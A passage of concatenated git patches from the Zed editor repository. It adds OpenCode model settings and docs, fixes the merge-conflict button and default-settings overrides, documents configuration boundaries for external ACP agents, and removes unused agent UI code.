Some(65_536), // OpenAI-compatible models - Self::MiniMaxM2_5 | Self::MiniMaxM2_5Free => Some(65_536), - Self::Glm5 | Self::BigPickle => Some(128_000), - Self::KimiK2_5 => Some(65_536), - Self::MimoV2ProFree => Some(131_072), - Self::MimoV2OmniFree | Self::MimoV2FlashFree => Some(65_536), - Self::TrinityLargePreviewFree | Self::Nemotron3SuperFree => Some(16_384), + Self::MiniMaxM2_7 => Some(131_072), + Self::MiniMaxM2_5 | Self::MiniMaxM2_5Free => Some(131_072), + Self::Glm5 | Self::Glm5_1 => Some(131_072), + Self::BigPickle => Some(128_000), + Self::KimiK2_6 | Self::KimiK2_5 => Some(65_536), + Self::Qwen3_5Plus | Self::Qwen3_6Plus => Some(65_536), + Self::Nemotron3SuperFree => Some(128_000), + Self::MimoV2Pro | Self::MimoV2Omni => Some(64_000), Self::Custom { max_output_tokens, .. @@ -377,15 +483,20 @@ impl Model { // Google models support images Self::Gemini3_1Pro | Self::Gemini3Flash => true, - // OpenAI-compatible models — conservative default + // OpenAI-compatible models with image support + Self::KimiK2_6 + | Self::KimiK2_5 + | Self::MimoV2Omni + | Self::Qwen3_5Plus + | Self::Qwen3_6Plus => true, + + // OpenAI-compatible models without image support Self::MiniMaxM2_5 | Self::MiniMaxM2_5Free | Self::Glm5 - | Self::KimiK2_5 - | Self::MimoV2ProFree - | Self::MimoV2OmniFree - | Self::MimoV2FlashFree - | Self::TrinityLargePreviewFree + | Self::Glm5_1 + | Self::MiniMaxM2_7 + | Self::MimoV2Pro | Self::BigPickle | Self::Nemotron3SuperFree => false, @@ -400,12 +511,12 @@ impl Model { } } -/// Stream generate content for Google models via OpenCode Zen. +/// Stream generate content for Google models via OpenCode. /// /// Unlike `google_ai::stream_generate_content()`, this uses: /// - `/v1/models/{model}` path (not `/v1beta/models/{model}`) /// - `Authorization: Bearer` header (not `key=` query param) -pub async fn stream_generate_content_zen( +pub async fn stream_generate_content( client: &dyn HttpClient, api_url: &str, api_key: &str, @@ -451,7 +562,7 @@ pub async fn stream_generate_content_zen( let mut text = String::new(); response.body_mut().read_to_string(&mut text).await?; Err(anyhow!( - "error during streamGenerateContent via OpenCode Zen, status code: {:?}, body: {}", + "error during streamGenerateContent via OpenCode, status code: {:?}, body: {}", response.status(), text )) diff --git a/crates/settings_content/src/language_model.rs b/crates/settings_content/src/language_model.rs index c14f854a724ce6..1a16c5264a70bd 100644 --- a/crates/settings_content/src/language_model.rs +++ b/crates/settings_content/src/language_model.rs @@ -150,6 +150,20 @@ impl Default for KeepAlive { pub struct OpenCodeSettingsContent { pub api_url: Option, pub available_models: Option>, + /// Whether to show OpenCode Zen models. Defaults to true. + pub show_zen_models: Option, + /// Whether to show OpenCode Go models. Defaults to true. + pub show_go_models: Option, + /// Whether to show OpenCode Free models. Defaults to true. + pub show_free_models: Option, +} + +#[derive(Clone, Copy, Debug, PartialEq, Eq, Serialize, Deserialize, JsonSchema, MergeFrom)] +#[serde(rename_all = "snake_case")] +pub enum OpenCodeModelSubscription { + Zen, + Go, + Free, } #[with_fallible_options] @@ -161,6 +175,10 @@ pub struct OpenCodeAvailableModel { pub max_output_tokens: Option, /// The API protocol to use for this model: "anthropic", "openai_responses", "openai_chat", or "google". pub protocol: String, + /// The subscription for this model: "zen", "go", or "free". Defaults to Zen. + pub subscription: Option, + /// Custom Model API URL to use for this model. + pub custom_model_api_url: Option, } #[with_fallible_options] diff --git a/docs/src/ai/llm-providers.md b/docs/src/ai/llm-providers.md index 92c490a05d2031..ec217ff081351f 100644 --- a/docs/src/ai/llm-providers.md +++ b/docs/src/ai/llm-providers.md @@ -31,6 +31,7 @@ Zed supports these providers with your own API keys: - [Ollama](#ollama) - [OpenAI](#openai) - [OpenAI API Compatible](#openai-api-compatible) +- [OpenCode](#opencode) - [OpenRouter](#openrouter) - [Vercel AI Gateway](#vercel-ai-gateway) - [Vercel](#vercel-v0) @@ -614,6 +615,74 @@ If a provider exposes models that only work with the Responses API, set `chat_co Note that LLM API keys aren't stored in your settings file. So, ensure you have it set in your environment variables (`_API_KEY=`) so your settings can pick it up. In the example above, it would be `TOGETHER_AI_API_KEY=`. +### OpenCode {#opencode} + +OpenCode offers multiple ways to access AI models: + +- [OpenCode Zen](https://opencode.ai/zen/): a pay-as-you-go subscription with access to a large number of tested and verified models +- [OpenCode Zen Free](https://opencode.ai/docs/zen/#pricing): free access to a limited set of models, with data and feedback collected to improve the models +- [OpenCode Go](https://opencode.ai/go): a low-cost monthly subscription with access to a validated set of open coding models + +1. Visit [OpenCode Console](https://opencode.ai/auth) and create an account +2. Free models are available without payment. To use Zen or Go models, make sure you have enough credits or an active subscription +3. Generate an API key from the "API Keys" section in the OpenCode Console +4. Open the settings view (`agent: open settings`) and go to the OpenCode section +5. Enter your OpenCode API key + +The OpenCode API key will be saved in your keychain. + +Zed will also use the `OPENCODE_API_KEY` environment variable if it's defined. + +By default, models from all subscription types are shown. Optionally, you can hide subscriptions that are not relevant to you by clicking the toggles or by adding the following to your settings: + +```json [settings] +{ + "language_models": { + "opencode": { + "show_zen_models": true, + "show_go_models": false, + "show_free_models": false + } + } +} +``` + +#### Custom Models {#opencode-custom-models} + +The Zed agent comes pre-configured with OpenCode models. If you wish to use newer models or models with custom endpoints, you can do so by adding the following to your Zed settings file ([how to edit](../configuring-zed.md#settings-files)): + +```json [settings] +{ + "language_models": { + "opencode": { + "available_models": [ + { + "name": "my-custom-model", + "display_name": "My Custom Model", + "max_tokens": 123456, + "max_output_tokens": 98765, + "protocol": "openai_chat", + "subscription": "go", + "custom_model_api_url": "https://example.com/zen" + } + ] + } + } +} +``` + +The available configuration options for custom models are: + +- `name` (required): model id used by OpenCode, for example `glm-9000` +- `display_name` (optional): human-readable model name shown in the UI, for example `Custom GLM 9000` +- `max_tokens` (required): maximum model context window size, for example `1000000` +- `max_output_tokens` (optional): maximum tokens the model can generate, for example `64000` +- `protocol` (required): model API protocol, one of `"anthropic"`, `"openai_responses"`, `"openai_chat"`, or `"google"` +- `subscription` (optional): `"zen"`, `"go"`, or `"free"` (defaults to `"zen"`) +- `custom_model_api_url` (optional): custom API base URL to use instead of the default OpenCode API + +Custom models will be listed in the model dropdown in the Agent Panel. + ### OpenRouter {#openrouter} OpenRouter provides access to multiple AI models through a single API. It supports tool use for compatible models. From 0d0d86d75cba09af9f59e1a2fcbf0bf81a9ace57 Mon Sep 17 00:00:00 2001 From: Danilo Leal <67129314+danilo-leal@users.noreply.github.com> Date: Fri, 24 Apr 2026 11:41:44 -0300 Subject: [PATCH 020/231] Fix when agent-powered merge conflict button shows up (#54791) This PR fixes the logic to dismiss the "resolve merge conflict with agent" button. Previously, we were just observing `merge_heads_by_conflicted_path`, which seems to be intentionally sticky, preserving the conflicted paths until changes are either committed or aborted. This would make the button to resolve conflicts show up even _after_ the changes get resolved. Now, we're checking whether paths are _currently_ conflicted (`is_conflicted()`), and if they are not, we don't display the button, even though the resolution might have not been committed or aborted yet. As a bonus, in this PR, I'm also putting the resolve conflict button _before_ the activity indicator, so as to avoid bounciness, and did a quick polish of the activity indicator button itself, by using the `Button` component. Release Notes: - Fixed a bug with the merge conflict "resolve with agent" button where it would be displayed even though all conflicts have already been resolved. --- .../src/activity_indicator.rs | 71 +++++++++---------- crates/git_ui/src/conflict_view.rs | 6 ++ crates/zed/src/zed.rs | 2 +- 3 files changed, 39 insertions(+), 40 deletions(-) diff --git a/crates/activity_indicator/src/activity_indicator.rs b/crates/activity_indicator/src/activity_indicator.rs index 5f4e25b5ccd40c..7aa5b91a4c2f7f 100644 --- a/crates/activity_indicator/src/activity_indicator.rs +++ b/crates/activity_indicator/src/activity_indicator.rs @@ -3,8 +3,8 @@ use editor::Editor; use extension_host::{ExtensionOperation, ExtensionStore}; use futures::StreamExt; use gpui::{ - App, Context, CursorStyle, Entity, EventEmitter, InteractiveElement as _, ParentElement as _, - Render, SharedString, StatefulInteractiveElement, Styled, Window, actions, + App, Context, Entity, EventEmitter, InteractiveElement as _, ParentElement as _, Render, + SharedString, Styled, Window, actions, }; use language::{ BinaryStatus, LanguageRegistry, LanguageServerId, LanguageServerName, @@ -22,10 +22,7 @@ use std::{ sync::Arc, time::{Duration, Instant}, }; -use ui::{ - ButtonLike, CommonAnimationExt, ContextMenu, PopoverMenu, PopoverMenuHandle, Tooltip, - prelude::*, -}; +use ui::{CommonAnimationExt, ContextMenu, PopoverMenu, PopoverMenuHandle, Tooltip, prelude::*}; use util::truncate_and_trailoff; use workspace::{StatusItemView, Workspace, item::ItemHandle}; @@ -720,43 +717,39 @@ impl Render for ActivityIndicator { }; let activity_indicator = cx.entity().downgrade(); let truncate_content = content.message.len() > MAX_MESSAGE_LEN; + result.gap_2().child( PopoverMenu::new("activity-indicator-popover") .trigger( - ButtonLike::new("activity-indicator-trigger").child( - h_flex() - .id("activity-indicator-status") - .gap_2() - .children(content.icon) - .map(|button| { - if truncate_content { - button - .child( - Label::new(truncate_and_trailoff( - &content.message, - MAX_MESSAGE_LEN, - )) - .size(LabelSize::Small), - ) - .tooltip(Tooltip::text(content.message)) - } else { - button - .child(Label::new(content.message).size(LabelSize::Small)) - .when_some( - content.tooltip_message, - |this, tooltip_message| { - this.tooltip(Tooltip::text(tooltip_message)) - }, - ) - } + Button::new("activity-indicator-trigger", { + if truncate_content { + truncate_and_trailoff(&content.message, MAX_MESSAGE_LEN) + } else { + content.message.clone() + } + }) + .label_size(LabelSize::Small) + .when(content.icon.is_some(), |this| { + this.start_icon( + Icon::new(IconName::LoadCircle) + .color(Color::Muted) + .size(IconSize::Small), + ) + }) + .map(|button| { + if truncate_content { + button.tooltip(Tooltip::text(content.message)) + } else { + button.when_some(content.tooltip_message, |this, tooltip_message| { + this.tooltip(Tooltip::text(tooltip_message)) }) - .when_some(content.on_click, |this, handler| { - this.on_click(cx.listener(move |this, _, window, cx| { - handler(this, window, cx); - })) - .cursor(CursorStyle::PointingHand) - }), - ), + } + }) + .when_some(content.on_click, |this, handler| { + this.on_click(cx.listener(move |this, _, window, cx| { + handler(this, window, cx); + })) + }), ) .anchor(gpui::Anchor::BottomLeft) .menu(move |window, cx| { diff --git a/crates/git_ui/src/conflict_view.rs b/crates/git_ui/src/conflict_view.rs index 25175dce481637..d5c5fe02bfe5b5 100644 --- a/crates/git_ui/src/conflict_view.rs +++ b/crates/git_ui/src/conflict_view.rs @@ -418,6 +418,12 @@ fn collect_conflicted_file_paths(project: &Project, cx: &App) -> Vec { for repo in git_store.repositories().values() { let snapshot = repo.read(cx).snapshot(); for (repo_path, _) in snapshot.merge.merge_heads_by_conflicted_path.iter() { + let is_currently_conflicted = snapshot + .status_for_path(repo_path) + .is_some_and(|entry| entry.status.is_conflicted()); + if !is_currently_conflicted { + continue; + } if let Some(project_path) = repo.read(cx).repo_path_to_project_path(repo_path, cx) { paths.push( project_path diff --git a/crates/zed/src/zed.rs b/crates/zed/src/zed.rs index f25f20b26baaaa..6d1a9c176f1193 100644 --- a/crates/zed/src/zed.rs +++ b/crates/zed/src/zed.rs @@ -573,8 +573,8 @@ pub fn initialize_workspace(app_state: Arc, cx: &mut App) { status_bar.add_left_item(lsp_button, window, cx); status_bar.add_left_item(diagnostic_summary, window, cx); status_bar.add_left_item(active_file_name, window, cx); - status_bar.add_left_item(activity_indicator, window, cx); status_bar.add_left_item(merge_conflict_indicator, window, cx); + status_bar.add_left_item(activity_indicator, window, cx); status_bar.add_right_item(edit_prediction_ui, window, cx); status_bar.add_right_item(active_buffer_encoding, window, cx); status_bar.add_right_item(active_buffer_language, window, cx); From e979679fd38493371f5375192b414f14cce7d9ed Mon Sep 17 00:00:00 2001 From: morgankrey Date: Fri, 24 Apr 2026 10:04:03 -0500 Subject: [PATCH 021/231] docs: Document configuration boundaries for external agents (#54759) ## Summary - Add a new "Configuration Boundaries" section to the external agents documentation explaining what settings are shared between Zed and ACP agents - Clarify bidirectional configuration story: what Zed forwards to agents AND what agents inherit from native installations - Add troubleshooting section for common user confusion points - Update MCP docs with clearer cross-links ## Context Users are confused about which Zed settings apply to external ACP agents like Claude and Codex. Common questions: - "I configured MCP in Zed but Claude can't see it" - "My Codex config.toml isn't being used" - "Do profiles apply to external agents?" ## Key Points **What Zed forwards to ACP agents:** - Model/mode selection, env vars, MCP servers (with limitations), CLAUDE.md **What's NOT forwarded:** - Profiles, tool permissions settings, `.rules` files **What agents DON'T inherit from native installations:** - `~/.claude/` config, `~/.codex/config.toml`, native MCP servers, authentication state ## Test plan - [x] Review for technical accuracy against codebase - [x] Check brand voice compliance Release Notes: - N/A --- docs/src/ai/external-agents.md | 101 ++++++++++++++++++++++++++++++++- docs/src/ai/mcp.md | 5 +- 2 files changed, 100 insertions(+), 6 deletions(-) diff --git a/docs/src/ai/external-agents.md b/docs/src/ai/external-agents.md index dc3b246f34f28a..454079c2d26793 100644 --- a/docs/src/ai/external-agents.md +++ b/docs/src/ai/external-agents.md @@ -253,7 +253,102 @@ This lets you see the messages being sent and received between Zed and the agent It's helpful to attach data from this view if you're opening issues about problems with external agents like Claude Agent, Codex, OpenCode, etc. -## MCP Servers +## Configuration Boundaries {#configuration-boundaries} -Note that for external agents, access to MCP servers [installed from Zed](./mcp.md) may vary depending on the ACP implementation. -For example, Claude Agent and Codex both support it, but Gemini CLI does not yet. +External agents run as separate processes that communicate with Zed via the [Agent Client Protocol (ACP)](https://agentclientprotocol.com). This creates important boundaries between Zed's configuration and the agent's native configuration. + +### What Zed Forwards to External Agents + +When you start an external agent thread, Zed sends: + +| Setting | How to Configure | +| --------------------- | --------------------------------------------------------------------- | +| Model selection | `agent_servers..default_model` in settings | +| Mode selection | `agent_servers..default_mode` in settings | +| Environment variables | `agent_servers..env` in settings | +| MCP servers | `context_servers` in settings (see [limitations](#mcp-server-access)) | +| Working directory | Automatically set to project root | + +**Not forwarded:** + +- [Profiles](./agent-panel.md#profiles) — profiles only apply to Zed's first-party agent +- [Tool permissions](./tool-permissions.md) settings — external agents request permissions at runtime via UI prompts +- Rules files — Zed's [rules system](./rules.md) only applies to Zed's first-party agent (external agents read their own rules files directly) + +### What External Agents Read Directly {#native-config} + +External agents run as CLI tools with full filesystem access. They read their own configuration files directly — Zed doesn't forward or block these. + +#### Claude Agent + +Claude Agent runs Claude Code under the hood, which reads its standard configuration: + +| Config | Read by Claude Agent? | +| ----------------------------------- | ----------------------------------------------------------------- | +| `~/.claude/` directory | Yes — Claude Code reads its own settings and memory | +| CLAUDE.md files | Yes — Claude Code reads these directly from the project | +| Skills | Yes — exposed via the Claude Agent SDK | +| MCP servers from Claude Code config | Yes — but Zed also forwards its own MCP servers via ACP | +| Hooks | No — [not supported](https://code.claude.com/docs/en/hooks-guide) | +| Authentication | Separate — you must authenticate via `/login` in Zed | + +> **Why separate authentication?** Zed isolates Claude Agent authentication to give you control over which account and billing method you use. + +#### Codex + +Codex runs the Codex CLI under the hood, which reads its standard configuration: + +| Config | Read by Codex? | +| ----------------------------- | ----------------------------------------------- | +| `~/.codex/config.toml` | Yes — Codex CLI reads its own config | +| MCP servers from Codex config | Yes — but Zed also forwards its own MCP servers | +| `CODEX_API_KEY` env var | Yes — inherited from your shell environment | +| `OPENAI_API_KEY` env var | Yes — inherited from your shell environment | +| ChatGPT OAuth login | Separate — you must re-authenticate in Zed | + +You can also pass environment variables through Zed settings: + +```json [settings] +{ + "agent_servers": { + "codex-acp": { + "type": "registry", + "env": { + "CODEX_API_KEY": "your-key", + "CUSTOM_PROVIDER_URL": "https://..." + } + } + } +} +``` + +### MCP Server Access {#mcp-server-access} + +MCP servers configured in Zed's `context_servers` are forwarded to Claude Agent and Codex via the ACP protocol. + +- **Local stdio-based MCP servers:** Work reliably +- **Remote MCP servers with OAuth:** May have issues ([#54410](https://github.com/zed-industries/zed/issues/54410)) + +External agents can access MCP servers from two sources: Zed's `context_servers` (forwarded via ACP) and their own native configuration files (`~/.claude/`, `~/.codex/config.toml`). + +For more on configuring MCP servers, see [Model Context Protocol](./mcp.md). + +### Troubleshooting {#troubleshooting} + +**"I enabled MCP tools in Zed but the agent can't see them"** + +1. Verify the MCP server is enabled in `context_servers` settings +2. For remote MCP servers with OAuth, this is a [known issue](https://github.com/zed-industries/zed/issues/54410) — try local stdio-based servers instead +3. Open `dev: open acp logs` from the Command Palette to debug + +**"My existing Claude Code / Codex setup isn't working in Zed"** + +External agents read their own config files, but authentication is handled separately: + +1. Re-authenticate via `/login` (Claude Agent) or the authentication prompt (Codex) +2. Your existing MCP servers and settings from `~/.claude/` or `~/.codex/config.toml` should work +3. You can also configure additional settings via `agent_servers..env` in Zed + +**"Profiles don't affect my external agent"** + +Correct — [profiles](./agent-panel.md#profiles) only apply to Zed's first-party agent. External agents have their own tool sets and don't use Zed's profile system. diff --git a/docs/src/ai/mcp.md b/docs/src/ai/mcp.md index 96ef71e683c010..dbe2f10af039f8 100644 --- a/docs/src/ai/mcp.md +++ b/docs/src/ai/mcp.md @@ -157,10 +157,9 @@ Learn more about [how tool permissions work](./tool-permissions.md), how to furt ### External Agents -Note that for [external agents](./external-agents.md) connected through the [Agent Client Protocol](https://agentclientprotocol.com/), access to MCP servers installed from Zed may vary depending on the ACP agent implementation. +MCP servers configured in Zed are forwarded to [external agents](./external-agents.md) via the [Agent Client Protocol](https://agentclientprotocol.com/). External agents can also access MCP servers from their own native configuration files. -Regarding the built-in ones, Claude Agent and Codex both support it, and Gemini CLI does not yet. -In the meantime, learn how to add MCP server support to Gemini CLI through [their documentation](https://github.com/google-gemini/gemini-cli?tab=readme-ov-file#using-mcp-servers). +For details on what configuration is shared between Zed and external agents, see [Configuration Boundaries](./external-agents.md#configuration-boundaries). ### Error Handling From 034a78de4e7224cf9aed87b29394db37a58d60cb Mon Sep 17 00:00:00 2001 From: Kirill Bulatov Date: Fri, 24 Apr 2026 18:05:52 +0300 Subject: [PATCH 022/231] Fix default.json profile and os settings not applying on startup (#54635) When started working on "disable the profiler for all but Nightly and Dev" users, I've tried to do that using the default OS settings and discovered that those are ignored. Release Notes: - Fixed default.json profile and os settings not applying on startup --- crates/settings/src/settings_store.rs | 51 ++++++++++++++++++++++----- 1 file changed, 43 insertions(+), 8 deletions(-) diff --git a/crates/settings/src/settings_store.rs b/crates/settings/src/settings_store.rs index 9215a53760b626..0eb6a32465bbe9 100644 --- a/crates/settings/src/settings_store.rs +++ b/crates/settings/src/settings_store.rs @@ -286,13 +286,8 @@ pub struct SettingsJsonSchemaParams<'a> { impl SettingsStore { pub fn new(cx: &mut App, default_settings: &str) -> Self { - Self::new_with_semantic_tokens(cx, default_settings) - } - - pub fn new_with_semantic_tokens(cx: &mut App, default_settings: &str) -> Self { let (setting_file_updates_tx, mut setting_file_updates_rx) = mpsc::unbounded(); - let default_settings: SettingsContent = - SettingsContent::parse_json_with_comments(default_settings).unwrap(); + let default_settings = Self::parse_default_settings(default_settings).unwrap(); if !cx.has_global::() { cx.set_global::( crate::parse_json_with_comments::( @@ -897,12 +892,25 @@ impl SettingsStore { default_settings_content: &str, cx: &mut App, ) -> Result<()> { - self.default_settings = - SettingsContent::parse_json_with_comments(default_settings_content)?.into(); + self.default_settings = Self::parse_default_settings(default_settings_content)?.into(); self.recompute_values(None, cx); Ok(()) } + /// Parses the default settings JSON and folds any `dev`/`nightly`/`preview`/`stable` + /// release-channel overrides and `macos`/`linux`/`windows` platform overrides into + /// the returned [`SettingsContent`]. + /// + /// Unlike user settings, default settings are used directly as the base for all + /// merges, so overrides must be resolved up front. + fn parse_default_settings(default_settings: &str) -> Result { + let parsed = UserSettingsContent::parse_json_with_comments(default_settings)?; + let mut merged = (*parsed.content).clone(); + merged.merge_from_option(parsed.for_release_channel()); + merged.merge_from_option(parsed.for_os()); + Ok(merged) + } + /// Sets the user settings via a JSON string. #[must_use] pub fn set_user_settings( @@ -1776,6 +1784,33 @@ mod tests { ); } + #[gpui::test] + fn test_default_settings_release_channel_overrides(cx: &mut App) { + assert_eq!( + *release_channel::RELEASE_CHANNEL, + release_channel::ReleaseChannel::Dev, + "tests expect the dev release channel", + ); + + let mut defaults: serde_json::Value = + crate::parse_json_with_comments(&default_settings()).unwrap(); + let root = defaults + .as_object_mut() + .expect("default settings must be a JSON object"); + root.insert("dev".into(), serde_json::json!({ "auto_update": false })); + root.insert("stable".into(), serde_json::json!({ "auto_update": true })); + let defaults_with_overrides = serde_json::to_string(&defaults).unwrap(); + + let mut store = SettingsStore::new(cx, &defaults_with_overrides); + store.register_setting::(); + + assert_eq!( + store.get::(None), + &AutoUpdateSetting { auto_update: false }, + "dev override from default settings should apply", + ); + } + #[gpui::test] fn test_settings_store_basic(cx: &mut App) { let mut store = SettingsStore::new(cx, &default_settings()); From d8f502016d5780e80c15108d1281ed965aedc013 Mon Sep 17 00:00:00 2001 From: Bennet Bo Fenner Date: Fri, 24 Apr 2026 17:52:27 +0200 Subject: [PATCH 023/231] agent_ui: Remove unused APIs (#54774) Release Notes: - N/A --- crates/agent_ui/src/agent_panel.rs | 119 +----------------- crates/agent_ui/src/conversation_view.rs | 13 +- .../src/conversation_view/thread_view.rs | 43 ------- crates/agent_ui/src/inline_assistant.rs | 45 ------- crates/agent_ui/src/inline_prompt_editor.rs | 20 --- crates/agent_ui/src/mention_set.rs | 5 - crates/agent_ui/src/message_editor.rs | 82 +----------- 7 files changed, 7 insertions(+), 320 deletions(-) diff --git a/crates/agent_ui/src/agent_panel.rs b/crates/agent_ui/src/agent_panel.rs index 3ef0934e2deedc..e52e82120a2e49 100644 --- a/crates/agent_ui/src/agent_panel.rs +++ b/crates/agent_ui/src/agent_panel.rs @@ -74,8 +74,8 @@ use terminal::terminal_settings::TerminalSettings; use terminal_view::{TerminalView, terminal_panel::TerminalPanel}; use theme_settings::ThemeSettings; use ui::{ - Button, Callout, ContextMenu, ContextMenuEntry, IconButton, PopoverMenu, PopoverMenuHandle, - Tab, Tooltip, prelude::*, utils::WithRemSize, + Button, ContextMenu, ContextMenuEntry, IconButton, PopoverMenu, PopoverMenuHandle, Tab, + Tooltip, prelude::*, utils::WithRemSize, }; use util::ResultExt as _; use workspace::{ @@ -705,7 +705,6 @@ pub struct AgentPanel { selected_agent: Agent, _thread_view_subscription: Option, _active_thread_focus_subscription: Option, - show_trust_workspace_message: bool, _base_view_observation: Option, _draft_editor_observation: Option, _thread_metadata_store_subscription: Subscription, @@ -1063,7 +1062,6 @@ impl AgentPanel { selected_agent: Agent::default(), _thread_view_subscription: None, _active_thread_focus_subscription: None, - show_trust_workspace_message: false, new_user_onboarding_upsell_dismissed: AtomicBool::new(OnboardingUpsell::dismissed(cx)), _base_view_observation: None, _draft_editor_observation: None, @@ -1288,20 +1286,6 @@ impl AgentPanel { } } - pub fn create_thread( - &mut self, - source: &'static str, - window: &mut Window, - cx: &mut Context, - ) -> ThreadId { - let agent = self.selected_agent(cx); - let thread = self.create_agent_thread(agent, None, None, None, None, source, window, cx); - let thread_id = thread.conversation_view.read(cx).thread_id; - self.retained_threads - .insert(thread_id, thread.conversation_view); - thread_id - } - pub fn activate_retained_thread( &mut self, id: ThreadId, @@ -1320,30 +1304,6 @@ impl AgentPanel { ); } - pub fn remove_thread(&mut self, id: ThreadId, window: &mut Window, cx: &mut Context) { - self.retained_threads.remove(&id); - ThreadMetadataStore::global(cx).update(cx, |store, cx| { - store.delete(id, cx); - }); - - if self - .draft_thread - .as_ref() - .is_some_and(|d| d.read(cx).thread_id == id) - { - self.draft_thread = None; - self._draft_editor_observation = None; - } - - if self.active_thread_id(cx) == Some(id) { - self.clear_overlay_state(); - self.activate_draft(false, "agent_panel", window, cx); - self.serialize(cx); - cx.emit(AgentPanelEvent::ActiveViewChanged); - cx.notify(); - } - } - pub fn active_thread_id(&self, cx: &App) -> Option { match &self.base_view { BaseView::AgentThread { conversation_view } => { @@ -1374,28 +1334,6 @@ impl AgentPanel { } } - pub fn clear_editor(&self, id: ThreadId, window: &mut Window, cx: &mut Context) { - let cv = self - .retained_threads - .get(&id) - .or_else(|| match &self.base_view { - BaseView::AgentThread { conversation_view } - if conversation_view.read(cx).thread_id == id => - { - Some(conversation_view) - } - _ => None, - }); - let Some(cv) = cv else { return }; - let Some(tv) = cv.read(cx).root_thread_view() else { - return; - }; - let editor = tv.read(cx).message_editor.clone(); - editor.update(cx, |editor, cx| { - editor.clear(window, cx); - }); - } - fn new_native_agent_thread_from_summary( &mut self, action: &NewNativeAgentThreadFromSummary, @@ -2003,26 +1941,6 @@ impl AgentPanel { false } - /// active thread plus any background threads that are still running or - /// completed but unseen. - pub fn parent_threads(&self, cx: &App) -> Vec> { - let mut views = Vec::new(); - - if let Some(server_view) = self.active_conversation_view() { - if let Some(thread_view) = server_view.read(cx).root_thread_view() { - views.push(thread_view); - } - } - - for server_view in self.retained_threads.values() { - if let Some(thread_view) = server_view.read(cx).root_thread_view() { - views.push(thread_view); - } - } - - views - } - fn update_thread_work_dirs(&self, cx: &mut Context) { let new_work_dirs = self.project.read(cx).default_path_list(cx); let new_worktree_paths = self.project.read(cx).worktree_paths(cx); @@ -3594,38 +3512,6 @@ impl AgentPanel { } } - fn render_workspace_trust_message(&self, cx: &Context) -> Option { - if !self.show_trust_workspace_message { - return None; - } - - let description = "To protect your system, third-party code—like MCP servers—won't run until you mark this workspace as safe."; - - Some( - Callout::new() - .icon(IconName::Warning) - .severity(Severity::Warning) - .border_position(ui::BorderPosition::Bottom) - .title("You're in Restricted Mode") - .description(description) - .actions_slot( - Button::new("open-trust-modal", "Configure Project Trust") - .label_size(LabelSize::Small) - .style(ButtonStyle::Outlined) - .on_click({ - cx.listener(move |this, _, window, cx| { - this.workspace - .update(cx, |workspace, cx| { - workspace - .show_worktree_trust_security_modal(true, window, cx) - }) - .log_err(); - }) - }), - ), - ) - } - fn key_context(&self) -> KeyContext { let mut key_context = KeyContext::new_with_defaults(); key_context.add("AgentPanel"); @@ -3675,7 +3561,6 @@ impl Render for AgentPanel { } })) .child(self.render_toolbar(window, cx)) - .children(self.render_workspace_trust_message(cx)) .children(self.render_new_user_onboarding(window, cx)) .map(|parent| match self.visible_surface() { VisibleSurface::Uninitialized => parent, diff --git a/crates/agent_ui/src/conversation_view.rs b/crates/agent_ui/src/conversation_view.rs index a32eaed2ddfdf8..3b2381f1c20747 100644 --- a/crates/agent_ui/src/conversation_view.rs +++ b/crates/agent_ui/src/conversation_view.rs @@ -1,9 +1,8 @@ use acp_thread::{ - AcpThread, AcpThreadEvent, AgentSessionInfo, AgentThreadEntry, AssistantMessage, - AssistantMessageChunk, AuthRequired, LoadError, MaxOutputTokensError, MentionUri, - PermissionOptionChoice, PermissionOptions, PermissionPattern, RetryStatus, - SelectedPermissionOutcome, ThreadStatus, ToolCall, ToolCallContent, ToolCallStatus, - UserMessageId, + AcpThread, AcpThreadEvent, AgentThreadEntry, AssistantMessage, AssistantMessageChunk, + AuthRequired, LoadError, MaxOutputTokensError, MentionUri, PermissionOptionChoice, + PermissionOptions, PermissionPattern, RetryStatus, SelectedPermissionOutcome, ThreadStatus, + ToolCall, ToolCallContent, ToolCallStatus, UserMessageId, }; use acp_thread::{AgentConnection, Plan}; use action_log::{ActionLog, ActionLogTelemetry, DiffStats}; @@ -1335,10 +1334,6 @@ impl ConversationView { } } - pub fn workspace(&self) -> &WeakEntity { - &self.workspace - } - pub fn agent_key(&self) -> &Agent { &self.connection_key } diff --git a/crates/agent_ui/src/conversation_view/thread_view.rs b/crates/agent_ui/src/conversation_view/thread_view.rs index 34699d15a064d3..accc82a2ff7323 100644 --- a/crates/agent_ui/src/conversation_view/thread_view.rs +++ b/crates/agent_ui/src/conversation_view/thread_view.rs @@ -312,7 +312,6 @@ pub struct ThreadView { pub new_server_version_available: Option, pub resumed_without_history: bool, pub(crate) permission_selections: HashMap, - pub resume_thread_metadata: Option, pub _cancel_task: Option>, _save_task: Option>, _draft_resolve_task: Option>, @@ -538,7 +537,6 @@ impl ThreadView { is_loading_contents: false, new_server_version_available: None, permission_selections: HashMap::default(), - resume_thread_metadata: None, _cancel_task: None, _save_task: None, _draft_resolve_task: None, @@ -623,10 +621,6 @@ impl ThreadView { } } - pub fn is_draft(&self, cx: &App) -> bool { - self.thread.read(cx).entries().is_empty() - } - pub(crate) fn as_native_connection( &self, cx: &App, @@ -2164,43 +2158,6 @@ impl ThreadView { ) } - pub fn handle_open_rules( - &mut self, - _: &ClickEvent, - window: &mut Window, - cx: &mut Context, - ) { - let Some(thread) = self.as_native_thread(cx) else { - return; - }; - let project_context = thread.read(cx).project_context().read(cx); - - let project_entry_ids = project_context - .worktrees - .iter() - .flat_map(|worktree| worktree.rules_file.as_ref()) - .map(|rules_file| ProjectEntryId::from_usize(rules_file.project_entry_id)) - .collect::>(); - - self.workspace - .update(cx, move |workspace, cx| { - // TODO: Open a multibuffer instead? In some cases this doesn't make the set of rules - // files clear. For example, if rules file 1 is already open but rules file 2 is not, - // this would open and focus rules file 2 in a tab that is not next to rules file 1. - let project = workspace.project().read(cx); - let project_paths = project_entry_ids - .into_iter() - .flat_map(|entry_id| project.path_for_entry(entry_id, cx)) - .collect::>(); - for project_path in project_paths { - workspace - .open_path(project_path, None, true, window, cx) - .detach_and_log_err(cx); - } - }) - .ok(); - } - fn activity_bar_bg(&self, cx: &Context) -> Hsla { let editor_bg_color = cx.theme().colors().editor_background; let active_color = cx.theme().colors().element_selected; diff --git a/crates/agent_ui/src/inline_assistant.rs b/crates/agent_ui/src/inline_assistant.rs index d94e0d8782bc54..cdff9785df78b1 100644 --- a/crates/agent_ui/src/inline_assistant.rs +++ b/crates/agent_ui/src/inline_assistant.rs @@ -608,51 +608,6 @@ impl InlineAssistant { assist_to_focus } - pub fn suggest_assist( - &mut self, - editor: &Entity, - mut range: Range, - initial_prompt: String, - initial_transaction_id: Option, - 